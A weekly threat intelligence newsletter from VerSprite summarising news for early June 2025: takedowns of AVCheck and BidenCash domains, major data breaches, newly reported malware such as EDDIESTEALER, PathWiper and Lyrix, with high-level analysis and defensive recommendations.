VerSprite Weekly Threat Intelligence

Date Range: 02 June 2025 – 06 June 2025

Issue: 17th Edition

Security Triumphs of the Week

This week marked a series of major victories for global cybersecurity efforts. Microsoft launched a strategic European security initiative to boost international cooperation against cybercrime and protect critical infrastructure. Law enforcement successfully dismantled AVCheck, a vital malware testing platform used by threat actors, severely disrupting their development pipeline. In coordinated global operations, the U.S. Department of Justice seized four domains supporting crypting services and 145 domains linked to the BidenCash carding marketplace. These takedowns represent significant blows to the cybercriminal ecosystem, signaling strengthened international collaboration and proactive disruption of malicious infrastructure.

• Microsoft Unveils European Security Effort to Disrupt Cybercrime Networks
  Microsoft has launched a new European security initiative to proactively combat escalating cybercrime across the continent. This initiative will enhance collaboration with law enforcement, EU governments, and private sector entities to dismantle online criminal operations. Microsoft plans to expand threat intelligence sharing, improve incident response, and fortify cloud defenses against transnational cyber threats. It will also focus on protecting critical infrastructure and defending against state-sponsored attackers. This marks a strategic investment in bolstering Europe’s cybersecurity resilience.
  Read full article: Gbhackers

• Police Shut Down AVCheck – A Key Malware Development Service
  Law enforcement has dismantled AVCheck, a critical underground service used by cybercriminals to test malware against antivirus engines. The platform allowed malware developers to fine-tune their code to avoid detection, making it a core tool for widespread malware deployment. The takedown marks a significant disruption to the cybercriminal supply chain, especially for ransomware and spyware operators. Authorities seized infrastructure and arrested individuals tied to the service’s operation. This action is a huge blow to malware developers worldwide.
  Read full article: Cybernews

• U.S. DoJ Seizes 4 Domains Supporting Crypting Services in Global Operation
  In a coordinated global crackdown, the U.S. Department of Justice seized four domains providing crypting services to cybercriminals. These services were used to obfuscate malware, helping it bypass security solutions and spread more effectively. The takedown was part of a broader international law enforcement collaboration targeting cyber infrastructure. Authorities have also identified the operators and are pursuing further legal action. This operation sends a strong message to those facilitating the malware economy.
  Read full article: Thehackernews

• DoJ Seizes 145 Domains Linked to BidenCash Carding Marketplace
  The U.S. Department of Justice executed a major blow against financial cybercrime by seizing 145 domains associated with BidenCash, a notorious carding marketplace. The platform sold stolen credit card data and offered illicit financial services to cybercriminals. This seizure was part of an extensive international takedown involving law enforcement from multiple countries. The action severely disrupts cybercriminal financial ecosystems and helps protect victims of payment data theft.
  Read full article: Thehackernews

Security Setbacks of the Week

This week brought several alarming cybersecurity setbacks across multiple sectors. A breach at Next Step Healthcare exposed patients’ sensitive data, including SSNs, medical records, and credit card details. In a separate incident, hackers leaked 86 million AT&T user records with decrypted SSNs, raising serious concerns about identity theft. A sophisticated phishing campaign targeting Armenian civil society and government via Signal was also uncovered, pointing to possible nation-state involvement. Most notably, over 4 billion user records were leaked in one of the largest data breaches ever reported, affecting countless individuals worldwide. These incidents emphasize the urgent need for stronger data protection and cyber resilience measures.

• Next Step Healthcare Data Breach Exposes Sensitive Patient Data
  A major breach at Next Step Healthcare has compromised sensitive personal and medical data of patients. Exposed information includes Social Security Numbers (SSNs), medical records, insurance details, and even credit card data. The breach raises serious concerns about patient privacy and the cybersecurity posture of healthcare institutions. While investigations are underway, affected individuals are being notified and offered identity protection services. This incident highlights the continuing vulnerability of healthcare organizations to targeted cyberattacks.
  Read full article: Comparitech

• Hackers Leak 86 million AT&T Records with Decrypted SSNs
  A devastating leak has exposed data from 86 million AT&T users, including decrypted Social Security Numbers. The leaked information also contains full names, email addresses, dates of birth, and device data, presenting a massive identity theft risk. The breach, allegedly stemming from a prior intrusion, was recently made public by hackers on an underground forum. AT&T has initiated an investigation, though it claims the source of the leak remains unclear. This incident ranks among the largest telecom-related breaches in recent years.
  Read full article: Hackread

• Signal Phishing Campaign Targets Armenian Civil Society and Government
  A highly targeted phishing campaign exploiting Signal messaging is actively attacking Armenian government officials and civil society members. The attackers use fake login pages and phishing messages to steal credentials and gain access to sensitive conversations and organizational data. The campaign is believed to be state-aligned and showcases sophisticated social engineering tactics. Researchers warn that such phishing operations undermine trust in secure communication platforms and threaten national security interests.
  Read full article: Securityonline

• Over 4 billion Records Leaked in One of the Largest Breaches Ever
  This week saw one of the largest data leaks in history, with over 4 billion user records exposed online. The leak includes usernames, email addresses, phone numbers, and hashed passwords, affecting a wide range of services globally. Security researchers discovered the massive data trove on an unprotected instance accessible to the public. The origins remain unclear, though the breach is likely a compilation from past data dumps. Experts urge users to update passwords and enable multi-factor authentication immediately.
  Read full article: Techradar

The New Emerging Threats

This week saw a surge in sophisticated and deceptive cyber threats. The EDDIESTEALER malware, written in Rust, uses fake CAPTCHA prompts to stealthily steal credentials from unsuspecting users. Ukraine’s infrastructure came under attack from PathWiper, a newly discovered data-wiping malware designed for destruction and likely linked to geopolitical motives. ViperSoftX returned with major enhancements in stealth, modularity, and persistence, making it harder to detect and remove. A scam dubbed HuluCaptcha misleads users into executing malicious PowerShell commands through fake CAPTCHA pages. Meanwhile, Lyrix ransomware emerged with advanced evasion tactics, posing a serious risk to Windows environments. These developments highlight the growing sophistication and variety of cyberattack techniques being deployed globally.

• EDDIESTEALER Infostealer Delivered via Fake CAPTCHA Prompts
  A new malware dubbed EDDIESTEALER has emerged, written in Rust and cleverly disguised as a CAPTCHA challenge to steal user credentials. Victims are lured through phishing pages that present fake CAPTCHA forms which silently execute malicious routines. Once executed, the malware exfiltrates login credentials, browser data, and system information to remote servers. Its use of Rust helps it evade many traditional security tools. This campaign underscores the growing trend of using deceptive UX tactics in malware delivery.
  Read full article: Securitybrief

• New PathWiper Malware Targets Ukrainian Critical Infrastructure
  A destructive new data wiper known as PathWiper has been used in cyberattacks against Ukrainian critical infrastructure in early 2025. The malware is designed to permanently erase files and disable systems, effectively halting operations across impacted sectors. PathWiper’s tactics resemble earlier nation-state wiper attacks but exhibit updated obfuscation techniques and anti-recovery features. Security analysts believe the campaign may be geopolitically motivated.
  Read full article: Thehackernews

• ViperSoftX Malware Upgrades Its Modularity and Persistence
  The ViperSoftX malware has resurfaced with significant upgrades, including enhanced stealth, modular architecture, and persistent backdoor capabilities. Previously known for its clipboard hijacking and cryptocurrency theft, the new version now embeds itself more deeply into Windows systems. It utilizes PowerShell, obfuscated JavaScript loaders, and multiple persistence layers to remain undetected. These improvements make it harder to remove and ideal for long-term data exfiltration.
  Read full article: Cyberpress

• HuluCaptcha Scam Executes Code via Fake CAPTCHA Kit
  A new scam called HuluCaptcha tricks users into executing commands on their Windows systems under the guise of a CAPTCHA verification. Victims are presented with a fraudulent CAPTCHA challenge that contains clipboard-pasting instructions, which—if followed—allow malicious PowerShell code execution through the Windows Run dialog. The campaign is primarily distributed through compromised and phishing websites and poses a serious threat to less security-savvy users.
  Read full article: Cyberpress

• Lyrix Ransomware Targets Windows with Advanced Evasion Techniques
  A new ransomware strain named Lyrix is actively targeting Windows systems using advanced evasion and anti-analysis features. Lyrix leverages encrypted payload delivery, in-memory execution, and sandbox detection to bypass traditional defenses. Once inside the system, it encrypts user files and demands cryptocurrency ransom payments. The ransomware also includes a custom loader to avoid triggering endpoint detection solutions. Experts warn it could become a major threat to businesses if distributed on a wider scale.
  Read full article: Gbhackers

In-Depth Expert CTI Analysis

This week showcased a strong global crackdown on cybercrime infrastructure and a parallel escalation in highly targeted, sophisticated threat campaigns. While Microsoft and international law enforcement led major proactive takedowns, adversaries launched advanced phishing, wiper, and credential-theft malware campaigns, exploiting both human trust and system vulnerabilities. These developments underscore the dual need for strategic alliances and deep technical defense.

Proactive Defense and Strategic Foresight

• Microsoft launched a European cybersecurity initiative to boost cross-border cooperation, threat intel sharing, and critical infrastructure protection.
• Global law enforcement dismantled AVCheck, a malware testing service pivotal to ransomware and spyware development pipelines.
• U.S. DOJ seized 4 crypting service domains and 145 domains tied to the BidenCash carding market, disrupting cybercrime monetization chains.
• These actions represent proactive disruption and an evolving model for multilateral cyber defense.

Evolving Ransomware and Malware Tactics

• EDDIESTEALER abused fake CAPTCHAs to stealthily harvest credentials via deceptive browser prompts.
• ViperSoftX resurfaced with modular, persistent implants leveraging obfuscated loaders and PowerShell scripts.
• Lyrix Ransomware used in-memory execution and sandbox evasion to encrypt systems stealthily.
• PathWiper malware targeted Ukrainian infrastructure, likely geopolitically motivated.
• HuluCaptcha scam executed malicious PowerShell via clipboard trickery disguised as CAPTCHA interaction.

State-Sponsored and Organized Cybercrime Convergence

• Signal phishing targeting Armenian civil society suggests advanced, state-aligned espionage.
• PathWiper and credential-focused phishing reflect strategic intent to cripple and infiltrate.
• AT&T breach (86M users) and Next Step Healthcare attack highlight persistent targeting of high-value PII and critical services.

Operational and Tactical Implications

• 4+ billion records leaked in a massive compilation breach—scope spans countless services.
• Signal-based phishing kits, and fake login campaigns targeting encrypted comms tools, erode trust in secure messaging.
• Dynamic infrastructure and social engineering remain key attacker tools.

Forward-Looking Recommendations

• Deploy real-time, context-aware MFA across all systems.
• Advance regional threat intelligence sharing mechanisms to detect early-stage campaigns.
• Dynamic infrastructure and social engineering remain key attacker tools.
• Build resilience for phishing-resistant communications, even secure apps can be targeted.
• Automate breach detection based on data exfil patterns and anomalous traffic.

Additional Resources & Contact

VerSprite on LinkedIn

VerSprite on Twitter

Email VerSprite